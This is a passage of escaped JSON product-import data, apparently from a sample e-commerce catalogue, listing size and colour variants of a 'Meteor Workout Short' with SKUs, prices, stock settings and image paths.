wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"856\":{\"sku\":\"MSH03-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-33-Blue\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"857\":{\"sku\":\"MSH03-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-33-Green\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"858\":{\"sku\":\"MSH03-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-34-Black\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"859\":{\"sku\":\"MSH03-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-34-Blue\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"860\":{\"sku\":\"MSH03-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-34-Green\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"861\":{\"sku\":\"MSH03-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-36-Black\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"862\":{\"sku\":\"MSH03-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-36-Blue\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"863\":{\"sku\":\"MSH03-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short-36-Green\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"meteor-workout-short-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"864\":{\"sku\":\"MSH03\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"